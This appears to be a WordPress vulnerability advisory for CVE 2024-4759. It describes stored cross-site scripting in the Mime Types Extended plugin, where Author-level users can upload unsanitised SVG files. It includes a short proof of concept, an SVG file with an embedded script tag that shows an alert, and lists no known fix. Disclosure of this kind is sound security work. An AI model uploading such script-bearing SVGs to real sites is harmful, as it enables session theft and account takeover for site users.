Mime Types Extended <= 0.11 – Author+ Stored XSS via SVG Upload | CVE 2024-4759 | Plugin Vulnerabilities

Description

The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.

Proof of Concept

1. As an admin, enable SVG uploads at https://example.com/wp-admin/options-general.php?page=mime-types-extended
2. As an author, upload a malicious SVG via the Media Library. Example SVG:

```
<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert("xss");</script>
</svg>
```

Affects Plugins

mime-types-extended

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

1c7547fa-539a-4890-a94d-c57b3d025507

Timeline

Publicly Published

2024-06-04 (about 26 days ago)

Added

2024-06-04 (about 25 days ago)

Last Updated

2024-06-04 (about 25 days ago)

Other

Published

Title

Published

2023-04-18

Title

Thumbnail carousel slider < 1.1.10 - Reflected XSS

Published

2017-06-06

Title

Event Calendar WD <= 1.0.93 - Authenticated Cross-Site Scripting (XSS)

Published

2021-03-17

Title

Elementor < 3.1.4 - Authenticated Stored Cross-Site Scripting (XSS) in Accordion Widget

Published

2023-02-03

Title

VK All in One Expansion Unit < 9.86.0.0 - Contributor+ Stored XSS

Published

2022-12-23

Title

Easy Accordion < 2.2.0 - Contributor+ Stored XSS